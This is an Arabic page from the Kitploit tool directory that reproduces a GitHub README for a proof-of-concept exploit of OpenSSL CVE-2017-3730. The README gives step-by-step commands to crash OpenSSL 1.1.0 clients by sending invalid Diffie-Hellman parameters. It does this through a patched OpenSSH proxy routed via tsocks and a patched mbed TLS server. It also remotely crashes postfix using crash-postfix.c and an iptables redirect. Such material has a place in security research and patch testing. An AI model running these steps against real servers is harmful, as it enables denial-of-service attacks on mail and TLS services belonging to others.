Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-3730 — إثبات المفهوم لثغرة CVE-2017-3730 في OpenSSL | Kitploit
أدوات/GitHubGitHub/olivierh59500/cve-2017-3730
تحليل الثغرات الأمنيةالاستغلالأمن الشبكاتالتشفيراختبار الاختراقاستغلال الملفات الثنائية
GitHubolivierh59500/cve-2017-3730

CVE-2017-3730

إثبات المفهوم لثغرة CVE-2017-3730 في OpenSSL

عرض المستودع
5منذ 9 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-3730

إثبات المفهوم لثغرة OpenSSL CVE-2017-3730

استخدام OpenSSH كوسيط لتعديل قيم DH أثناء العمل

  • أنشئ خادم SSL باستخدام حزمة تشفير مثل DHE-PSK-WITH-AES-256-GCM-SHA384. لنفترض أنه يعمل على 10.0.2.2 على المنفذ 8899
  • احصل على openssh-7.4p1
  • طبّق التصحيح (patch)
  • قم ببنائه
  • شغّله كما يلي:
root@kitploit:~
./ssh -vvv -N -D 1085 -o TCPKeepAlive=yes -o ServerAliveInterval=60 localhost
  • في طرفية أخرى، أنشئ ملفاً باسم ~/.tsocks.conf بالمحتوى التالي:
root@kitploit:~
server = 127.0.0.1
server_port = 1085
server_type = 5
local = 127.0.0.0/255.255.255.0
  • ```export TSOCKS_CONF_FILE=`realpath ~/.tsocks.conf````
  • tsocks
  • يؤدي هذا إلى إنشاء قشرة (shell) تمر عبرها جميع حركة مرور الشبكة عبر وسيطنا «الخبيث»
  • openssl s_client -connect 10.0.2.2:8899 -psk AA
  • انهيار

تعديل mbed TLS لتقديم معامل DH غير صالح

  • احصل على https://github.com/ARMmbed/mbedtls/archive/mbedtls-2.4.1.tar.gz
  • طبّق mbedtls-2.4.1-patch.txt
  • make -j4 programs
  • شغّل الخادم: programs/ssl/ssl_server2 force_ciphersuite=TLS-DHE-RSA-WITH-AES-256-GCM-SHA384
  • اتصل به باستخدام عميل OpenSSL 1.1.0
  • انهيار

تعطيل postfix عن بُعد

  • قم بتجميع postfix باستخدام OpenSSL 1.1.0
  • قم بتجميع crash-postfix.c مع mbed TLS المُصحَّح (انظر أعلاه)
  • ما فعلته هو تشغيل postfix في جهاز افتراضي (VM) وتشغيل crash-postfix على المضيف:
  • iptables -t nat -A OUTPUT -p tcp --dport 25 -j DNAT --to-destination 10.0.2.2:8888
  • ابدأ تشغيل crash-postfix
  • شغّل postfix: posttls-finger 10.0.2.2
  • انهيار
تنزيل الأداة